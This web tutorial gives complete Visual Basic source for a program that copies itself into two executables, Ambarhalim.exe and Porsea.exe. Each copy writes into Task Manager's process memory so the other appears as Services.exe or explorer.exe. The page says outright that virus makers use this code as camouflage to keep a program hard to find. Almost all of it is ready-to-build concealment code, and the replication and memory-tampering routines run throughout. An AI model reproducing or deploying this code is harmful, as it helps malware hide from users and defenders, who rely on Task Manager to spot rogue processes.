Modifiers task manager list

We will make a program, where the program is able to insert fake information the program name into the task manager. If we want to change the name of our program, then we have to take the data memory in the Task Manager program using ReadProcessMemory API function, then revamped and re-entry into the Task Manager by using the API function.

For more details we will create a program that can copy itself to be several programs, where these programs will be mutually changed their name in the Task Manager.

For example, the program name is Ambarhalim.exe and Porsea.exe.
- Ambarhalim.exe will change the Porsea.exe name to be Services.exe.
- Porsea.exe will change the Ambarhalim.exe name to be explorer.Exe.

This project created using Visual Basic. The steps are as follows:
1. Run the Visual Basic program
on your PC.
2. Make 1 listbox (Listbox1) and 1 timer (Timer1) in the form1.
3. Set interval timer value to 500 (0.5 seconds).

In the Form1 code window, enter the source code below.

Private Sub Form_Load()
Dim index1 As String
Dim Ambarhalim As String
Dim Porsea As String

index1 = App.Path & "\" & App.EXEName & ".exe"
Ambarhalim = App.Path & "\Ambarhalim.exe"
Porsea = App.Path & "\Porsea.exe"

If App.EXEName <> "Ambarhalim" And App.EXEName <> "Porsea" Then
FileCopy index1, Ambarhalim
FileCopy index1, Porsea
Shell Ambarhalim
Shell Porsea
End
End If
End Sub

In the Timer1 code window, enter the source code below.

Private Sub Timer1_Timer()
Timer1.Enabled = False
If Second(Now) Mod 5 = 0 Then Update
If App.EXEName = "Ambarhalim" Then Disguise "Porsea.exe", "Services.exe"
If App.EXEName = "Porsea" Then Disguise "Ambarhalim.exe", "explorer.exe"

Timer1.Enabled = True
End Sub

For this project we also need the file module, add the module file! In the Module1 code window, enter the source code below.

Option Explicit

Const TH32CS_SNAPALL = (&H1 Or &H2 Or &H4 Or &H8)
Const TH32CS_SNAPPROCESS As Long = 2&

Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * 260
End Type

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private myHandle As Long
Private myproclist$

Public Function Update()
Dim hSnapShot As Long, uProcess As PROCESSENTRY32, r As Long

Form1.List1.Clear
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
uProcess.dwSize = Len(uProcess)
r = Process32First(hSnapShot, uProcess)
Do While r
Form1.List1.AddItem Left$(uProcess.szExeFile, IIf(InStr(1, uProcess.szExeFile, Chr$(0)) > 0, InStr(1, uProcess.szExeFile, Chr$(0)) - 1, 0))
Form1.List1.ItemData(Form1.List1.NewIndex) = uProcess.th32ProcessID
r = Process32Next(hSnapShot, uProcess)
Loop
CloseHandle hSnapShot
End Function

Private Function UNICODE(data As String) As String
Dim tmp As String
Dim i As Integer
tmp = ""
For i = 1 To Len(data)
tmp = tmp & Chr(0) & Mid(data, i, 1)
Next
UNICODE = tmp
End Function

Private Function InitProcHack(pid As Long) As Boolean
Dim pHandle As Long
pHandle = OpenProcess(&H1F0FFF, False, pid)
If (pHandle = 0) Then
InitProcHack = False
myHandle = 0
Else
InitProcHack = True
myHandle = pHandle
End If
End Function

Private Sub REPSTRINGINPROC(PIDX As Long, Origin As String, Recent As String)
Dim SRCHSTRING As String
Dim REPSTRING As String
Dim startpos As Integer
Dim p As String
Dim bytewrite As Long

If Not InitProcHack(PIDX) Then Exit Sub

Dim c As Integer
Dim addr As Long
Dim buffer As String * 30000
Dim readlen As Long
Dim writelen As Long

Corrective Origin, Recent

SRCHSTRING = UNICODE(Origin)
REPSTRING = UNICODE(Recent)

For addr = 0 To 4000
Call ReadProcessMemory(myHandle, addr * 20000, buffer, 20016, readlen)
If readlen > 0 Then
startpos = 1
While InStr(startpos, buffer, SRCHSTRING) > 0
p = (addr) * 20000 + InStr(startpos, buffer, SRCHSTRING) - 1
Call WriteProcessMemory(myHandle, CLng(p), REPSTRING, Len(REPSTRING), bytewrite)
startpos = InStr(startpos, buffer, Trim(SRCHSTRING)) + 1
Wend
End If
Next addr

DoEvents
Close #1
DoEvents
End Sub

Private Function Corrective(scr As String, rep As String)
Dim i As Integer
For i = 0 To Form1.List1.ListCount - 1
If LCase(Form1.List1.List(i)) = LCase(scr) Then
scr = Form1.List1.List(i)
Exit For
End If
Next

For i = 0 To Form1.List1.ListCount - 1
If LCase(Form1.List1.List(i)) = LCase(rep) Then
rep = Form1.List1.List(i)
Exit For
End If
Next

If Len(scr) > Len(rep) Then
rep = rep + Left(" ", Len(scr) - Len(rep))
End If
If Len(rep) > Len(scr) Then
scr = scr + Left(" ", Len(rep) - Len(scr))
End If
End Function

Public Sub Disguise(Origin As String, Recent As String)
Dim newproclist$
Dim myProcess As PROCESSENTRY32
Dim mySnapshot As Long

newproclist$ = ""
myProcess.dwSize = Len(myProcess)
mySnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)

Process32First mySnapshot, myProcess

If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then
If Left(myProcess.szExeFile, InStr(myProcess.szExeFile, Chr(0)) - 1) = "taskmgr.exe" Then
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
Else
DoEvents
End If
End If

newproclist$ = "[" & myProcess.th32ProcessID & "]"

While Process32Next(mySnapshot, myProcess)
If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then
If Left(myProcess.szExeFile, InStr(myProcess.szExeFile, Chr(0)) - 1) = "taskmgr.exe" Then
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
Else
DoEvents
End If
End If
newproclist$ = newproclist$ & "[" & myProcess.th32ProcessID & "]"
Wend

myproclist$ = newproclist$
End Sub

You are free to give a name to this program. This example source code is often used by virus maker as a camouflage so that the program hard to find.



Keyword: Modifiers task manager list | How to hack task manager list | How to crack task manager list

You may also like: